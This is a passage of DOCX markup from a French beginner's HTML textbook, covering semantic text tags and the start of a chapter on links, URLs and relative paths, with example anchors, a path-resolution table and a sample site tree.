        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> porte une information d'importance exploitée par les technologies d'assistance ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attire l'attention sans plus de sens.</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Les étapes ont un ordre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sert aux couples terme/définition, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux collections sans ordre.</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Les chevrons doivent être échappés en entités : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Sinon le navigateur interprète une balise au lieu d'afficher le texte.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifie le titre d'une œuvre. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est une présentation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une citation courte, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une insistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>5. Liens et navigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le Web est un réseau de documents reliés. Savoir écrire une URL, c'est construire l'architecture du site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : chapitre 4</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Écrire des liens relatifs et absolus sans erreur de chemin.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Concevoir une navigation accessible, cohérente et utilisable au clavier.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Distinguer les liens internes, externes, de téléchargement et de contact.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Maîtriser les ancres et les URL portant une requête.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Éviter les pièges de sécurité des liens externes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 L'anatomie d'un lien</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un lien est un élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doté de l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sa valeur est une URL : absolue si elle commence par un schéma, relative si elle décrit un chemin à partir du document courant. Le texte affiché — le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>libellé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — est ce que l'utilisateur lit et ce que les moteurs indexent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six liens, six usages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&lt;a href="https://developer.mozilla.org/"&gt;Documentation MDN&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="/cours/html5"&gt;Cours HTML5&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="../contact.html"&gt;Contact&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="#sommaire"&gt;Aller au sommaire&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="mailto:contact@exemple.fr"&gt;Écrire à l'équipe&lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;a href="tel:+22901020304"&gt;Appeler&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f08.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.8 — Les parties d'une URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'ancre n'est pas envoyée au serveur : elle est traitée localement. C'est pourquoi modifier une ancre ne provoque pas de nouvelle requête, alors que modifier la requête, oui.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Chemins relatifs : la règle des dossiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un chemin relatif se lit toujours depuis le fichier qui contient le lien. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne le dossier courant, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> le dossier parent. Une erreur de chemin produit une 404 qui ne se voit pas en développement si le fichier existe par hasard ailleurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.16 — Cinq écritures de chemin et leur résolution</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64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Écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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 xml:space="preserve">Depuis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>blog/article.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contact.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Même dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blog/contact.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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/contact.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Racine du site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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contact.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>../index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dossier parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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../images/logo.svg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Dossier parent puis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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images/logo.svg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>https://exemple.fr/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>URL absolue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>toujours identique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UN CHEMIN ABSOLU DE SERVEUR N'EST PAS UN CHEMIN LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/images/logo.png</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> désigne la racine du site </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>telle que servie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Si vous ouvrez la page en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, cette racine devient la racine du disque et l'image disparaît. C'est une raison supplémentaire de travailler avec un serveur local.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une arborescence pour vérifier les chemins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mon-site/</w:t>
        <w:br/>
        <w:t>├── index.html</w:t>
        <w:br/>
        <w:t>├── contact.html</w:t>
        <w:br/>
        <w:t>└── blog/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── article.html</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── images/</w:t>
        <w:br/>
        <w:t xml:space="preserve">        └── schema.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Depuis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog/article.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../contact.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mène à la page de contact, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>images/schema.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à l'image du dossier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>../index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à l'accueil. Trois liens, trois chemins différents, tous corrects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Concevoir une navigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
